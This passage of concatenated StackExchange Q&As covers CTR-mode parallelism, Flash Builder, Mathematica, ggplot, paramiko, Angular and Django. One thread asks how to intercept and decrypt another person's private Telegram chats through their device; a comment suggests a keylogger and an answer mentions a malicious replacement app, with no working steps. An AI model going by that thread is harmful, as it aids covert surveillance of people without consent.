gains?\nIn NIST SP800-38A \u00a76.5 , it says: \n\nIn both CTR encryption and CTR decryption, the forward cipher functions can be performed in parallel...\n\nAnd this answer to \"Decryption a chunk of file with AES\", if I understand correctly, suggests that basically you have one task do $$O_j=CIPH_K(T_j) \\text{ for } j=1,2...\\frac{n}{2}$$ with another task doing $$O_j=CIPH_K(T_j) \\text{ for } j=\\frac{n}{2},\\frac{n}{2}+1...n$$ in parallel. \nIs this what NIST SP800-38A, was referring to, something along these lines?\nOr are there more or better ways to parallelize things?\nAnswer: From the diagram on CTR mode\nyou can notice that there are no dependencies between any of the phases of the pipeline. If you have more than one block-size worth of data, you can process each block-size chunk completely independently of the others by calculating $\\mathrm{ciphertext}_i = E(\\mathrm{key}, \\mathrm{nonce} \\, || \\, \\mathrm{counter}_i) \\oplus \\mathrm{plaintext}_i$.\nComment: $\\vert\\vert$ is concatenation, $\\oplus$ is XOR.\nComment: Okay i see. In $\\mathrm{ciphertext}_i = E(\\mathrm{nonce} \\, || \\, \\mathrm{counter}_i) \\oplus \\mathrm{plaintext}_i$, does $||$ just mean concatenation or ?\nAnswer: Generally, it depends on the architecture.\nIf you have $n$ processors available, the obvious way to parallelize CTR mode encryption is to distribute each chunk of $n$ consecutive blocks among the processors, so that processor $0 \\le i < n$ computes:\n$$ C_j = E_K(c_j) \\oplus P_j, \\quad j = i + kn, k = 0,1,2,\\dotsc$$\nwhere $c_j$ is the $j$-th counter value, $P_j$ and $C_j$ are the $j$-th plaintext and ciphertext blocks, $E_K(\\cdot)$ denotes block cipher encryption with the key $K$, and $\\oplus$ denotes XOR. Of course, as CTR decryption is identical to encryption, the same scheme can be used for both. When encrypting data in RAM, it is also generally most efficient to do the encryption in place, with the output overwriting the input.\nThis basic parallelization scheme makes most sense if the processors are accessing the memory via a shared cache, or if they're dedicated hardware units that access shared memory only via a controller unit. (In the latter case, it may also make sense for the processors to only handle the keystream generation, and leave the relatively trivial XOR operation to the controller.)\nIf the processors each have a local cache, it may be more efficient to split the ciphertext into longer chunks, of a suitable size to fit into this cache, and have each processor encrypt one chunk at a time. This can be particularly effective if the bus width \/ optimal transfer burst size between the cache and the main memory storing the plaintext \/ ciphertext is longer than one cipher block. Again, if the memory controller is smart enough to perform the XOR operation directly, without having to first transfer the plaintext to the processors and the ciphertext back, this is an optimization worth taking.\nOn general-purpose processors that support efficient SIMD operations, having each processor encrypt several blocks at can also enable the use of bit-slicing techniques in the block cipher encryption process. However, this does not necessarily require the blocks assigned to a single processor to be consecutive, merely that they're processed more than one at a time.\nAlso, CTR mode allows the keystream $E_K(c_j)$ to be computed in advance, even before the plaintext \/ ciphertext input is known. In some circumstances, such as when dealing with very bursty data transfers, buffering the keystream in advance may be useful.\nAnyway, the nice thing about CTR mode is that the result of the encryption process is exactly the same regardless of what order it's done in, or how many processors it's distributed over. In particular, this means that the two ends of an encrypted channel can each select the parallelization scheme that is most suited to them, even if their computational capabilities are wildly different.\n","meta":{"source":"crypto.stackexchange","title":"How can one parallelize tasks in CTR-AES for maximum performance?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Starting new actionscript project in Flash Builder 4.7: no SDK selection available\n\nQuestion: I'm using Flash Builder 4.7. When starting a new Actionscript Project, the first popup box where you define the project name etc doesn't show any SDK's. So under \"This project will use\" there is just an empty area...\nAnd in the created project I also can't link to a Flex SDK in the Actionscript Build Path.\nWhen starting a new Flex Project, everything is OK and I can choose between the different SDK's installed.\nAny idea what could be wrong?\nThanks in advance for any help!\nFrank\nComment: I don't see the issue. You don't need an SDK for a pure ActionScript project. (Except the compiler that is, but FB will use the compiler of the default SDK)\nComment: I had same problem awhile back with 4.7 - it started after i overlaid a different AIR SDK over Flex SDK (cant remember which versions). Seems that FB got a bit confused - something to do with the new compiler not liking the flex\/air merge i had done. I had to reinstall FB\nComment: yep, tried that, even reinstalled the complete damned Flash Builder...\nAnswer: Problem found and solved thanks to this blog post:\nhttp:\/\/www.badu.ro\/?p=238\nApparantly when moving from Flex Builder 4.6 to 4.7 you have to use new workspaces. If you reuse the existing ones from version 4.6 you run into problems like I was having...\nThanks for all your help,\nFrank\nAnswer: I suspect you are seeing errors because your class has no package definition.\n<code>package com.something.something\n{\n\/\/ imports\nimport flash.display.Sprite\n\/\/ class definition\n\n public class Something extends Sprite{\n\n }\n}\n<\/code>\nBut, you didn't show us the actual errors in your screenshot. IF that is not the error, please provide the text of your compiler errors \/ warnings. In Flash Builder, from the WIndow Menu select Show View and Problems. \nComment: I'm not sure why you'd get that on an ActionScript only project in Flash Builder 4.7. 4.7 should use the new 'Falcon' ActionScript compiler and not mxmlc from the Flex SDK.\nComment: I've heard that FB 4.7 is a total disaster. I switched to IntelliJ IDEA about 6 months ago (FB was at 4.6 at the time). Even though IDEA is not without its flaws, I wouldn't want to go back to FB even if they paid me for it.\nComment: I've heard similar things; although I've also heard it runs great on Windows. In my limited usage; I haven't run into any problems w\/ FB4.7, though.\nComment: This is the error message: Unknown Flex SDK: \"Flex 4.6.0\". Unknown Flex Problem\n","meta":{"source":"stackoverflow","title":"Starting new actionscript project in Flash Builder 4.7: no SDK selection available","dup_signals":{}},"subset":"stackexchange"} +{"text":"Piecewise function not plotting\n\nQuestion: I have piecewise function A which is defined as shown below. When I plot piecewise in Mathematica I could not able to see any points after x=3.5, but If I evaluate the A I am getting value. I am bit confused and curious why it is happening? Am I using the piecewise function properly?\n<code>z1 = 1;\nz2 = 2;\nz3 = 3;\nL = 4;\na1 = -0.0664623 Cos[1.52648 x] + 0.0664621 Cosh[1.52648 x] + \n 0.0736429 Sin[1.52648 x] - 0.0736415 Sinh[1.52648 x] \na2 = 0.0706263 Cos[1.52648 (-1 + x)] - \n 0.0012975 Cosh[1.52648 (-1 + x)] + \n 0.0696575 Sin[1.52648 (-1 + x)] - 0.0317435 Sinh[1.52648 (-1 + x)] \na3 = 0.0727183 Cos[1.52648 (-2 + x)] - \n 0.0727174 Cosh[1.52648 (-2 + x)] - 0.413845 Sin[1.52648 (-2 + x)] + \n 0.267041 Sinh[1.52648 (-2 + x)] \na4 = -0.410217 Cos[1.52648 (-3 + x)] + \n 0.410216 Cosh[1.52648 (-3 + x)] + 0.585447 Sin[1.52648 (-3 + x)] - \n 0.192384 Sinh[1.52648 (-3 + x)] \nA = Piecewise[{{a1, x <= z1}, {a2, z1 <= x <= z2}, {a3, \n z2 <= x <= z3}, {a4, x >= z3}}]\nPlot[A, {x, 0, L}]\n<\/code>\nComment: `Plot` has a lot of hidden calculating going on. Part of this tries to decide what range to plot. If you change your code to `Plot[A, {x, 0, L},PlotRange->All]` it will show you everything out to 4. You can look up `PlotRange` to see how to give it even more precise instructions.\nComment: @acoustics in the last position put `{a4, True}` instead `{a4, x >= z3}` and take `L=5` to check difference.\nAnswer: I have done some modifications on your code such that you can obtain your desired plot. If you want to have a different region in the plot you can change minX,maxX, minY and maxY values.\n<code>ClearAll[\"Global`*\"];\n\nz1 = 1;\nz2 = 2;\nz3 = 3;\nL = 4;\n\na1[x_] := -0.0664623 Cos[1.52648 x] + 0.0664621 Cosh[1.52648 x] + 0.0736429 Sin[1.52648 x] - 0.0736415 Sinh[1.52648 x];\na2[x_] := 0.0706263 Cos[1.52648 (-1 + x)] - 0.0012975 Cosh[1.52648 (-1 + x)] + 0.0696575 Sin[1.52648 (-1 + x)] - 0.0317435 Sinh[1.52648 (-1 + x)];\na3[x_] := 0.0727183 Cos[1.52648 (-2 + x)] - 0.0727174 Cosh[1.52648 (-2 + x)] - 0.413845 Sin[1.52648 (-2 + x)] + 0.267041 Sinh[1.52648 (-2 + x)];\na4[x_] := -0.410217 Cos[1.52648 (-3 + x)] + 0.410216 Cosh[1.52648 (-3 + x)] + 0.585447 Sin[1.52648 (-3 + x)] - 0.192384 Sinh[1.52648 (-3 + x)];\n\nA[x_] := Piecewise[{\n{a1[x], x <= z1},\n{a2[x], z1 <= x <= z2},\n{a3[x], z2 <= x <= z3},\n{a4[x], x >= z3}\n}];\n\nminX = 0;\nmaxX = L;\n\nminY = -0.5;\nmaxY = A[L];\n\nPlot[A[x], {x, 0, L}, PlotRange -> {{minX, maxX}, {minY, maxY}}]\n<\/code>\nWhen you run the code, you obtain\n","meta":{"source":"mathematica.stackexchange","title":"Piecewise function not plotting","dup_signals":{}},"subset":"stackexchange"} +{"text":"ggplot - geom_segment() with mutiple arrows\n\nQuestion: I am working on Principal Component Analysis (PCA).\nI found <code>ggfortify<\/code> works great but would like to do some manual adjustments.\nHere then trying to plot the PCA results as below:\n<code>evec <- read.table(textConnection(\"\n PC1 PC2 PC3\n -0.5708394 -0.6158420 -0.5430295\n -0.6210178 -0.1087985 0.7762086\n -0.5371026 0.7803214 -0.3203424\"\n), header = TRUE, row.names = c(\"M1\", \"M2\", \"M3\"))\n\nres.ct <- read.table(textConnection(\"\n PC1 PC2 PC3\n -1.762697 -1.3404825 -0.3098503\n -2.349978 -0.0531175 0.6890453\n -1.074205 1.5606429 -0.6406848\n 2.887080 -0.7272039 -0.3687029\n 2.299799 0.5601610 0.6301927\"\n), header = TRUE, row.names = c(\"A\", \"B\", \"C\", \"D\", \"E\"))\n\nrequire(ggplot2)\nrequire(dplyr)\ngpobj <- \n res.ct %>%\n ggplot(mapping = aes(x=PC1, y=PC2)) +\n geom_point(color=\"grey30\") +\n annotate(geom=\"text\", x=res.ct$PC1*1.07, y=res.ct$PC2*1.07,\n label=rownames(res.ct))\n\nfor (i in 1:nrow(evec))\n{\n PCx <- evec[i,1]\n PCy <- evec[i,2]\n axisname <- rownames(evec)[[i]]\n gpobj <- gpobj +\n geom_segment(\n data = evec[i,],\n aes(\n x = 0, y = 0,\n xend = PC1, yend = PC2\n # xend = PCx, yend = PCy #not work as intended\n ),\n arrow = arrow(length = unit(4, \"mm\")),\n color = \"red\"\n ) +\n annotate(\n geom = \"text\",\n x = PCx * 1.15, y = PCy * 1.15,\n label = axisname,\n color = \"red\"\n )\n}\ngpobj\n<\/code>\nThe code works well but when I tried to use the commented line <code>xend = PCx, yend = PCy<\/code> instead of <code>xend = PC1, yend = PC2<\/code>, it does not work well as I intended, it does not show the all arrows.\n<code>xend = PC1, yend = PC2<\/code> works well:\n\n<code>xend = PCx, yend = PCy<\/code> does not:\n\nQuestion: \nWhy does not <code>geom_segment()<\/code> maintain the previous arrow when the starting and ending points are specified by environment variables rather than referred by variable names from <code>data =<\/code>?\nComment: Which ggplot2 version are you using? Seems to yield the same result for 3.0.0.\nAnswer: In the code you used, when <code>PCx<\/code> \/ <code>PCy<\/code> are specified inside the aesthetic mapping <code>aes(...)<\/code> (as opposed to hard coding them to fixed aesthetic values outside <code>aes(...)<\/code>, as done for the <code>annotate<\/code> layers), the actual values are only evaluated when you plot \/ print the ggplot object <code>gpobj<\/code>.\nThis means the values of <code>PCx<\/code> \/ <code>PCy<\/code> are evaluated outside the for-loop. By this point, they correspond to the last values they took on, for <code>i = 3<\/code>, and that is why only one arrow segment (actually three arrows overlaid atop one another) is visible. Moving <code>xend = PCx, yend = PCy<\/code> outside <code>aes(...)<\/code> should achieve the look you want.\nI do wonder why you choose to use for-loops in the first place, though. Wouldn't something like the following serve the same purpose?\n<code># convert row names to explicit columns\nres.ct <- tibble::rownames_to_column(res.ct)\nevec <- tibble::rownames_to_column(evec)\n\n# plot\nres.ct %>%\n ggplot(mapping = aes(x=PC1, y=PC2)) +\n geom_point(color=\"grey30\") +\n geom_text(aes(x = PC1 * 1.07, y = PC2 * 1.07,\n label = rowname)) +\n geom_segment(data = evec,\n aes(x = 0, y = 0, xend = PC1, yend = PC2, group = rowname),\n arrow = arrow(length = unit(4, \"mm\")),\n color = \"red\") +\n geom_text(data = evec,\n aes(x = PC1 * 1.15, y = PC2 * 1.15, label = rowname),\n colour = \"red\")\n<\/code>\nComment: Thanks for your excellent answer. I didn't realized when the aesthetics variables are evaluated. Your example gave me a better understanding for ggplot2. (using ggplot2 version 3.1.1)\n","meta":{"source":"stackoverflow","title":"ggplot - geom_segment() with mutiple arrows","dup_signals":{}},"subset":"stackexchange"} +{"text":"Is it possible to decrypt Telegram messages from a private chat?\n\nQuestion: Assuming you have access to another person's device, set up a SOCKS5 proxy, install a root certificate to parse the SSL traffic, and take a screenshot of the private key of a private chat.\nIs it now possible to use the proxy to record a message and manually decrypt it with the private key?\nEDIT:\nYou can display the encryption key inside a private chat. Here is a screenshot.\nIs this the private key used to encrypt and decrypt the messages? On Telegram FAQ, you can read \"this is not the key itself, of course!\"\nIf not, is it possible to derive the encryption key from it? Or is the private key only stored deep in the app?\nComment: Don't forget to install key logger, too.\nComment: Unfortunately, it's not possible to install a key logger on iOS\nComment: What about https:\/\/celltrackingapps.com\/detect-a-keylogger-on-my-iphone\/\nComment: New!, [Apple's Borked iOS Update Leads to New Jailbreak and Vulnerable iPhones](https:\/\/gizmodo.com\/apples-borked-ios-update-leads-to-new-jailbreak-and-vul-1837374615)\nAnswer: The data is encrypted using a random AES key. The AES key is then encrypted using the receiver's public key. \nThe encrypted data along with the encrypted key is transmitted to the user, who uses their private key to decrypt the AES key, which in return is used to decrypt the encrypted text.\n\nIs it now possible to use the proxy to record a message and manually decrypt it with the private key?\n\nSince the private key is never transmitted during the communication process it is not possible to sniff them using a socks proxy with a root certificate in place on the device.\nI think it's a good idea to get a better understanding of how asymmetric encryption works. The following link breaks it down quite nicely using a simple way of explaining it: https:\/\/hackernoon.com\/asymmetric-encryption-explained-using-chocolate-boxes-5a329ea6813e\nComment: Thanks for your answer and further information! I have specified my question.\nAnswer: You are purporting an scenario where:\n\nAn attacker has full access to another person's device\nHe then wants do decrypt a later-received message\n\nHowever, assuming that the attacker got complete control (ie. root) of the device\n\nHe could extract the key of the private chat, that is stored in the app storage.\nOr, even more easy, replace the Telegram app with an evil Telegram which works as the legit one but additionally sends the attacker a decrypted copy of all messages.\nComment: Thanks for your answer! I'm interested in possibilities on a not-rooted iPhone. To my knowledge, it is not possible to extract the key or replace the app with a separate variant.\nAnswer: Some thoughts:\n\nThe screenshot shows the fingerprint of the key exchange between both users, not the key itself. It is therefore not usable for any attack.\nTelegram clients connect to hardcoded IP address lists and ports, and immediately want to speak MTproto, the internal Telegram protocol, so a SOCKS proxy won\u00b4t help you much, except you switch on proxy in the device (which is perfectly possible when you got access to the device)\nUpon connecting to the server the Telegram app will check the server messages against a cert signature - as long as you do not have the private server key of the MTproto conversation you won\u00b4t be able to fool the app or sniff the conversation in clear - and that\u00b4s even before the secret chat protocol begins.\nIf iOS warrants App safety so that just a plain access to the device without breaking it apart will not allow access to the App data storage in plain, you cannot exfiltrate the private user key.\n\nI doubt it will ever possible to break this open, especially without the user\u00b4s attention. Means you need to \"borrow\" the device for an unlimited amount of time until your attack is successful. Nothing to gain from 5 minutes sniffing on the device.\n","meta":{"source":"security.stackexchange","title":"Is it possible to decrypt Telegram messages from a private chat?","dup_signals":{}},"subset":"stackexchange"} +{"text":"ssh paramiko can't read xlsx files\n\nQuestion: I use paramiko to ssh\n<code>ssh = paramiko.SSHClient()\nssh.set_missing_host_key_policy( paramiko.AutoAddPolicy() ) \nssh.connect(Hostname, username=Username, password=Password) \nftp = ssh.open_sftp()\nfiles = ftp.listdir()\ndir_oi = \"directory_of_interest\"\nfoi = ftp.listdir(dir_oi)\n<\/code>\nand can find a read a <code>csv<\/code> successfully with:\n<code>remote_file = ( dir_oi +\"\/\" + foi[-1])\nwith ftp.open(remote_file) as f:\n df = pd.read_csv(f, sep = '\\t', header = None)\n<\/code>\nthe minute I change <code>remote_file<\/code> to an <code>xlsx<\/code>, with\n<code>with ftp.open(uw_remote_file) as f:\n df = pd.read_excel(f)\n<\/code>\nI get the error <code>SSHException: Server connection dropped:<\/code> or <code>Socket Closed<\/code>\nof note, I can run this line without any error <code>existing_xlsx = ftp.open(uw_remote_file)<\/code>\nAny suggestions how to overcome this?\nlogfile as requested:\n<code>DEB [20220519-09:22:45.998] thr=1 paramiko.transport.sftp: [chan 0] listdir(b'blah')\nDEB [20220519-09:22:48.009] thr=1 paramiko.transport.sftp: [chan 0] open(b'blah\/halb.csv', 'r')\nDEB [20220519-09:22:48.241] thr=1 paramiko.transport.sftp: [chan 0] open(b'blah\/halb.csv', 'r') -> 35323935333939313533313032363062\nDEB [20220519-09:22:49.084] thr=1 paramiko.transport.sftp: [chan 0] close(35323935333939313533313032363062)\nDEB [20220519-09:23:24.790] thr=1 paramiko.transport.sftp: [chan 0] listdir(b'blah2')\nDEB [20220519-09:24:01.590] thr=1 paramiko.transport.sftp: [chan 0] open(b'blah2\/halb2.xlsx', 'r')\nDEB [20220519-09:24:01.975] thr=1 paramiko.transport.sftp: [chan 0] open(b'blah2\/halb2.xlsx', 'r') -> 37343338363564356234303033663337\nDEB [20220519-09:24:23.510] thr=1 paramiko.transport.sftp: [chan 0] open(b'blah2\/halb2.xlsx', 'r')\nDEB [20220519-09:24:23.727] thr=1 paramiko.transport.sftp: [chan 0] open(b'blah2\/halb2.xlsx', 'r') -> 64646361316532373233663463613036\nDEB [20220519-09:24:24.108] thr=2 paramiko.transport: EOF in transport thread\nDEB [20220519-09:24:24.108] thr=1 paramiko.transport.sftp: [chan 0] close(64646361316532373233663463613036)\n<\/code>\ntraceback:\n<code>Traceback (most recent call last):\n File \"C:\\Users\\alexander.huhn.adm\\Anaconda3\\lib\\site-packages\\paramiko\\sftp_client.py\", line 852, in _read_response\n t, data = self._read_packet()\n File \"C:\\Users\\alexander.huhn.adm\\Anaconda3\\lib\\site-packages\\paramiko\\sftp.py\", line 201, in _read_packet\n x = self._read_all(4)\n File \"C:\\Users\\alexander.huhn.adm\\Anaconda3\\lib\\site-packages\\paramiko\\sftp.py\", line 188, in _read_all\n raise EOFError()\nEOFError\n\nDuring handling of the above exception, another exception occurred:\n\nTraceback (most recent call last):\n File \"C:\\Users\\alexander.huhn.adm\\AppData\\Local\\Temp\\24\\ipykernel_33560\\4051829457.py\", line 4, in <cell line: 2>\n df = pd.read_excel(f)\n File \"C:\\Users\\alexander.huhn.adm\\Anaconda3\\lib\\site-packages\\pandas\\util\\_decorators.py\", line 311, in wrapper\n return func(*args, **kwargs)\n File \"C:\\Users\\alexander.huhn.adm\\Anaconda3\\lib\\site-packages\\pandas\\io\\excel\\_base.py\", line 457, in read_excel\n io = ExcelFile(io, storage_options=storage_options, engine=engine)\n File \"C:\\Users\\alexander.huhn.adm\\Anaconda3\\lib\\site-packages\\pandas\\io\\excel\\_base.py\", line 1376, in __init__\n ext = inspect_excel_format(\n File \"C:\\Users\\alexander.huhn.adm\\Anaconda3\\lib\\site-packages\\pandas\\io\\excel\\_base.py\", line 1255, in inspect_excel_format\n buf = stream.read(PEEK_SIZE)\n File \"C:\\Users\\alexander.huhn.adm\\Anaconda3\\lib\\site-packages\\paramiko\\file.py\", line 219, in read\n new_data = self._read(read_size)\n File \"C:\\Users\\alexander.huhn.adm\\Anaconda3\\lib\\site-packages\\paramiko\\sftp_file.py\", line 185, in _read\n t, msg = self.sftp._request(\n File \"C:\\Users\\alexander.huhn.adm\\Anaconda3\\lib\\site-packages\\paramiko\\sftp_client.py\", line 822, in _request\n return self._read_response(num)\n File \"C:\\Users\\alexander.huhn.adm\\Anaconda3\\lib\\site-packages\\paramiko\\sftp_client.py\", line 854, in _read_response\n raise SSHException(\"Server connection dropped: {}\".format(e))\nparamiko.ssh_exception.SSHException: Server connection dropped:\n<\/code>\nI can download using\n<code>filepath = uw_remote_file\nlocalpath = \"test.xlsx\"\nftp.get(filepath,localpath)\n<\/code>\nso will go down that route and delete after use\nComment: Complete Python stack trace please + Paramiko log file + Can you download that file? I.e., can you do e.g. `fl = io.BytesIO()` + `sftp.getfo(file_name, fl)`?\nComment: You didn't provide the information I've asked for. Not did you really answer my question about the download.\nAnswer: From the log it looks like it were able to open both files. <code>pandas<\/code> is running into EOF error, So, which means excel file is completely empty.\nCan you confirm if that is empty.\nComment: when downloaded, was able to open and see the relevant data\n","meta":{"source":"stackoverflow","title":"ssh paramiko can't read xlsx files","dup_signals":{}},"subset":"stackexchange"} +{"text":"Different order of computations for nested Do\n\nQuestion: When I use\n<code>Do[Print[{a, b}],{a, 0, 2},{b, 0, 2}]\n<\/code>\nthen I (correctly) obtain\n<code>{0, 0} {0, 1} {0, 2} {1, 0} {1, 1} {1, 2} {2, 0} {2, 1} {2, 2}\n<\/code>\nHowever, I would like something like:\n<code>{0, 0} {0, 1} {1, 0} {0, 2} {1, 1} {2, 0} {1, 2} {2, 1} {2, 2}\n<\/code>\nThat is, I want to prioritize calculations for which $a+b$ is small.\nIs there any simple way to achieve this within the <code>Do<\/code> Command?\nComment: Maybe `Do[Print[{a, t - a}], {t, 0, 4}, {a, Max[0, t - 2], Min[t, 2]}]`?\nComment: @CarlWoll Interesting approach, that is really helpful. Note that it generalizes to more variables by `Do[Print[{a, s - a, t - s}], {t, 0, 6}, {s, Max[0, t - 2], \n Min[t, 4]}, {a, Max[0, s - 2], Min[s, 2]}]`, `Do[Print[{a, s - a, t - s, u - t}], {u, 0, 8}, {t, Max[0, u - 2], \n Min[u, 6]}, {s, Max[0, t - 2], Min[t, 4]}, {a, Max[0, s - 2], \n Min[s, 2]}]` etcetera\nAnswer: In my opinion, this doesn't seem like a very natural action to take with <code>Do<\/code>, which requires a fixed iterator specification.\nRather, you can construct a list with <code>Table<\/code> (note that the syntax is very similar to <code>Do<\/code>) :\n<code>Table[{a, b}, {a, 0, 2}, {b, 0, 2}]\n<\/code>\n\n{{{0, 0}, {0, 1}, {0, 2}}, {{1, 0}, {1, 1}, {1, 2}}, {{2, 0}, {2, 1}, {2, 2}}}\n\nYou can convert this to a list of tuples with <code>Flatten<\/code>:\n<code>Flatten[%, 1]\n<\/code>\n\n<code>{{0, 0}, {0, 1}, {0, 2}, {1, 0}, {1, 1}, {1, 2}, {2, 0}, {2, 1}, {2, 2}}\n<\/code>\n\nThen sort it according to the sum of the list elements:\n<code>sortedList = SortBy[%, Total]\n<\/code>\n\n<code>{{0, 0}, {0, 1}, {1, 0}, {0, 2}, {1, 1}, {2, 0}, {1, 2}, {2, 1}, {2, 2}}\n<\/code>\n\nFinally, you can iterate over the elements in this list using <code>Scan<\/code> :\n<code>Scan[Print, %]\n<\/code>\n\nEdit : It's worth mentioning that it's possible to use <code>Do<\/code> rather than <code>Scan<\/code> in the last line, but <code>Scan<\/code> is really a better fit here.\nIf you insist upon using <code>Do<\/code>, you can do\n<code>Do[Print[x], {x, sortedList}]\n<\/code>\nComment: Thanks for your reply. I will consider this, however I do not really like the idea of a possibly large sortedList sitting inside my ram.\nAnswer: You can generate zig-zag ordered indices dynamically, without generating all possible values first.\nHere is a simple zig-zag algorithm adopted from this SO answer.\nIt should be optimized if the speed is a concern.\nFunction <code>zigZagOrdering<\/code> converts an integer <code>index<\/code> (from <code>0<\/code> to <code>lengthA*lengthB-1<\/code>)\ninto the values of <code>a<\/code> (from <code>0<\/code> to <code>lengthA-1<\/code>) and <code>b<\/code> (from <code>0<\/code> to <code>lengthB-1<\/code>).\n<code>ClearAll[zigZagOrdering];\nzigZagOrdering = Compile[{{lengthA, _Integer}, {lengthB, _Integer}, {index, _Integer}},\nModule[{dx = 1, dy = -1, a=0, b=0},\n Do[\n a = a + dy;\n b = b + dx;\n If[a<0||b<0||a>=lengthA||b>=lengthB, {dx,dy} = {dy,dx}];\n If[a>=lengthA, a=lengthA-1; b=b+2];\n If[b>=lengthB, b=lengthB-1; a=a+2];\n If[a<0, a=0];\n If[b<0, b=0],\n {i, 0, index-1}];\n {a,b}\n ]]\n<\/code>\nThis function can be used as follows:\n<code>Module[{lengthA=3, lengthB=3, a, b},\n Do[\n {a,b} = zigZagOrdering[lengthA, lengthB, index];\n Print[{a,b}],\n {index, 0, lengthA*lengthB-1}\n ];\n ]\n<\/code>\n\n<code>{0,0}, {0,1}, {1,0}, {2,0}, {1,1}, {0,2}, {1,2}, {2,1}, {2,2}\n<\/code>\nAnswer: If you do not mind ultimately over a slightly bigger domain. (For example if you plan on aborting at some stage anyway) you can simply redefine you indices <code>A=a+b<\/code> and <code>b<\/code> \n<code>Do[Print[{A-b,b}],{A,0,4},{b,0,2}]\n<\/code>\nif you want to restrict to the same square domain\n<code>Do[Print[{(A-b),b}],{A,0,4},{B, Max[0,A-2] , Min[2,A]}]\n<\/code>\nComment: I very much like this method's simplicity, but I think it needs some refinement. The first code can be vastly improved by replacing `{B,-A,A}` with `{B,-A,A,2}` -- this eliminates all the fractions. (As a bonus, you can restrict to exactly the desired output by checking that `a<=2&&b<=2` in the body of `Do`.) Moreover, your second method doesn't work. It misses `{2,0}`, for example.\nComment: corrected the bounds. Works perfectly now\nComment: You still need to replace `B` with `b` in the iterator specification for your second method.\nComment: It's worth mentioning that the second method is now extremely similar to [CarlWoll](https:\/\/mathematica.stackexchange.com\/users\/45431\/carl-woll)'s [comment](https:\/\/mathematica.stackexchange.com\/questions\/146902\/different-order-of-computations-for-nested-do\/146934#comment394799_146902).\nAnswer: <code>all[{i_Integer}] := Sequence @@ {{0, i}, {i, 0}}\nall[{i_Integer, i_Integer}] := {i, i}\nall[{i_Integer, j_Integer}] := Sequence @@ {{i, j}, {j, i}}\nDo[Print \/@ all \/@ IntegerPartitions[i, 2, Range[3]], {i, 1, 7}]\n<\/code>\nAnswer: <code>SortBy[Tuples[Range[0, 2], 2], Total]\n\n{{0, 0}, {0, 1}, {1, 0}, {0, 2}, {1, 1}, {2, 0}, {1, 2}, {2, 1}, {2,2}}\n<\/code>\nAnswer: Take your list and then:\n<code>SortBy[mylist, Norm]\n<\/code>\nComment: Reasonable approach that gives `{{0, 0}, {0, 1}, {1, 0}, {0, 2}, {2, 0}, {1, 1}, {2, 2}, {1, 2}, {2, 1}}`. Similar but not identical to what was suggested in the question.\n","meta":{"source":"mathematica.stackexchange","title":"Different order of computations for nested Do","dup_signals":{}},"subset":"stackexchange"} +{"text":"\"Object doesn't support this action\" error when navigate to new component in IE\n\nQuestion: I got the error message when I stayed at a component and navigate to another one. The error will not show if I stay at that component and refresh. It happen in some components. I tried to create new component with nothing in the content, it's still happen if I navigate to this component. The error message is showed in a none-stop way. \nI'm using Angular 2 final. It's just happen in IE (Using IE11). Here is my package.json:\n<code>\"dependencies\": {\n \"@angular\/common\": \"~2.2.0\",\n \"@angular\/compiler\": \"~2.2.0\",\n \"@angular\/core\": \"~2.2.0\",\n \"@angular\/forms\": \"~2.2.0\",\n \"@angular\/http\": \"~2.2.0\",\n \"@angular\/platform-browser\": \"~2.2.0\",\n \"@angular\/platform-browser-dynamic\": \"~2.2.0\",\n \"@angular\/router\": \"~3.2.0\",\n \"@angular\/upgrade\": \"^2.2.0\",\n \"@ng-idle\/core\": \"^2.0.0-beta.4\",\n \"@ng-idle\/keepalive\": \"^2.0.0-beta.4\",\n \"angular2\": \"^2.0.0-beta.17\",\n \"angular2-in-memory-web-api\": \"0.0.21\",\n \"angular2-jwt\": \"0.1.25\",\n \"bootstrap-sass\": \"^3.3.7\",\n \"core-js\": \"2.4.1\",\n \"font-awesome\": \"^4.7.0\",\n \"ng2-pagination\": \"^1.0.1\",\n \"ng2-translate\": \"4.0.0\",\n \"reflect-metadata\": \"^0.1.8\",\n \"rxjs\": \"5.0.0-beta.12\",\n \"strip-bom\": \"^3.0.0\",\n \"typescript\": \"^2.1.4\",\n \"zone.js\": \"0.6.25\"\n },\n \"devDependencies\": {\n \"angular2-template-loader\": \"^0.6.0\",\n \"codelyzer\": \"1.0.0-beta.3\",\n \"copy-webpack-plugin\": \"^4.0.1\",\n \"extract-text-webpack-plugin\": \"^1.0.1\",\n \"file-loader\": \"^0.9.0\",\n \"gulp\": \"^3.9.1\",\n \"gulp-insert-lines\": \"0.0.4\",\n \"gulp-replace\": \"^0.5.4\",\n \"gulp-sass\": \"^2.3.2\",\n \"html-loader\": \"^0.4.4\",\n \"html-webpack-plugin\": \"^2.24.1\",\n \"istanbul-instrumenter-loader\": \"^1.0.0\",\n \"jasmine\": \"^2.5.2\",\n \"karma\": \"^1.3.0\",\n \"karma-coverage\": \"^1.1.1\",\n \"karma-jasmine\": \"^1.0.2\",\n \"karma-mocha-reporter\": \"^2.2.0\",\n \"karma-phantomjs-launcher\": \"^1.0.2\",\n \"karma-remap-istanbul\": \"^0.2.1\",\n \"karma-sourcemap-loader\": \"^0.3.7\",\n \"karma-webpack\": \"^1.8.0\",\n \"phantomjs-prebuilt\": \"^2.1.13\",\n \"raw-loader\": \"^0.5.1\",\n \"remap-istanbul\": \"^0.7.0\",\n \"ts-helpers\": \"^1.1.2\",\n \"ts-loader\": \"^1.2.1\",\n \"tslint\": \"^3.15.1\",\n \"tslint-loader\": \"^2.1.5\",\n \"typescript\": \"^2.1.4\",\n \"typings\": \"^2.0.0\",\n \"webpack\": \"^1.13.3\",\n \"webpack-dev-server\": \"^1.16.2\"\n }\n<\/code>\nAnd here is my polyfill.ts:\n<code>import 'core-js';\nimport 'reflect-metadata';\nimport 'zone.js\/dist\/zone';\n\nimport 'ts-helpers';\n\nif (process.env.ENV === 'prod') { \/\/ Production\n \/\/ @Todo: will be defined\n} else {\n \/\/ Development\n Error['stackTraceLimit'] = Infinity;\n require('zone.js\/dist\/long-stack-trace-zone');\n}\n<\/code>\nSee the error:\n\nIt did not happen before. So I can't find out the root cause and the solutions. Any ideas? Thanks\nAnswer: Finally I found the root cause. A function is called in none-stop way from the other library even in the pages have no objects which it need. No objects is provided, it caused the problem. I fixed it by adding condition to stop calling the function when in the pages with no provided object.\n","meta":{"source":"stackoverflow","title":"\"Object doesn't support this action\" error when navigate to new component in IE","dup_signals":{}},"subset":"stackexchange"} +{"text":"Proper way to get images from Django static folder\n\nQuestion: In my setting.py I have next code:\n<code>STATICFILES_FINDERS = [\n 